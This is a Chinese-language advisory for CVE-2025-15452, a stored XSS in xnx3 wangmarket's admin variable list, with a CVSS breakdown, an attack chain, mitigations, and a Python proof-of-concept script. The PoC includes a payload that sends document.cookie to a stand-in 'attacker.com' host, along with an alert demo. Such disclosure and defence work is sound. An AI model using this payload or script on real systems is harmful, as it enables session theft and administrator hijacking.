CVE-2025-15452 | xnx3 wangmarket后台变量搜索存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-15452

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

xnx3 wangmarket

漏洞概述

CVE-2025-15452是xnx3 wangmarket 4.9及之前版本中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于后台管理系统的变量搜索功能中，具体影响/admin/system/variableList.do文件中的variableList函数。攻击者可以通过在Description参数中注入恶意JavaScript代码，当其他管理员访问相关页面时，恶意脚本将在受害者浏览器上下文中执行，从而窃取会话Cookie、劫持用户会话或进行其他恶意操作。由于该漏洞需要高权限用户身份和用户交互才能利用，且影响范围为机密性和完整性较低，因此CVSS评分仅为2.4（低危）。漏洞已于2026年1月5日公开披露，厂商在收到提前通知后未做出任何回应。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting）漏洞，攻击者构造的恶意Payload会被永久存储在服务器端。漏洞点位于后台管理系统的变量管理模块，具体路径为/admin/system/variableList.do中的variableList函数。该函数在处理Description参数时未对用户输入进行充分的HTML实体编码或输入过滤，导致攻击者可以注入任意JavaScript代码。由于系统将用户输入直接存储并在后续页面加载时回显，恶意脚本会在管理员访问变量列表页面时自动执行。攻击者通常利用此漏洞窃取管理员的会话Cookie，进而获取后台管理权限或进行进一步的攻击。由于该漏洞位于后台功能，需要攻击者拥有后台管理员账号或通过其他方式获取高权限账号后才能利用。

攻击链分析

STEP 1

步骤1

攻击者获取或诱使管理员账号登录xnx3 wangmarket后台管理系统

STEP 2

步骤2

攻击者访问/admin/system/variableList.do后台变量搜索功能页面

STEP 3

步骤3

在Description参数中注入恶意JavaScript代码作为XSS Payload

STEP 4

步骤4

系统将恶意代码存储在数据库中，当其他管理员访问变量列表时触发执行

STEP 5

步骤5

恶意脚本在管理员浏览器中执行，窃取Cookie或会话信息

STEP 6

步骤6

攻击者利用窃取的会话冒充管理员进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15452 PoC - Stored XSS in xnx3 wangmarket variableList.do
# Target: /admin/system/variableList.do
# Parameter: Description

import requests
import sys
from urllib.parse import quote

target_url = "http://target.com/admin/system/variableList.do"

# XSS payload - steals admin cookies
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

# Alternative payload - alert demonstration
xss_payload_demo = "<script>alert(document.domain)</script>"

data = {
    "Description": xss_payload_demo,
    "variableName": "test",
    "submit": "save"
}

try:
    print(f"[*] Sending XSS payload to {target_url}")
    print(f"[*] Payload: {xss_payload_demo}")
    
    # If authentication is required, add session cookies
    # cookies = {"JSESSIONID": "your-session-id"}
    # response = requests.post(target_url, data=data, cookies=cookies)
    
    response = requests.post(target_url, data=data, timeout=10)
    
    print(f"[+] Request sent. Status: {response.status_code}")
    print("[*] Payload stored. When admin visits variableList.do, XSS will execute.")
    
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

xnx3 wangmarket <= 4.9

防御指南

临时缓解措施

在厂商发布修复补丁之前，可采取以下临时缓解措施：1）限制后台管理功能的访问权限，确保只有可信的管理员能够访问；2）在Web应用防火墙（WAF）中配置XSS防护规则，拦截包含<script>等特征的恶意请求；3）对后台关键功能启用双因素认证；4）监控后台变量管理功能的访问日志，及时发现异常操作行为；5）考虑临时禁用变量搜索功能以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15452
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15452
3 Details https://www.cvedetails.com/cve/CVE-2025-15452/
4 VulDB https://vuldb.com/cve/CVE-2025-15452
5 Link https://vuldb.com/?ctiid.339485
6 Link https://vuldb.com/?id.339485
7 Link https://vuldb.com/?submit.724840
8 Link https://www.yuque.com/cocount-eveo/lu0220/flbu025pfmwgudmg?singleDoc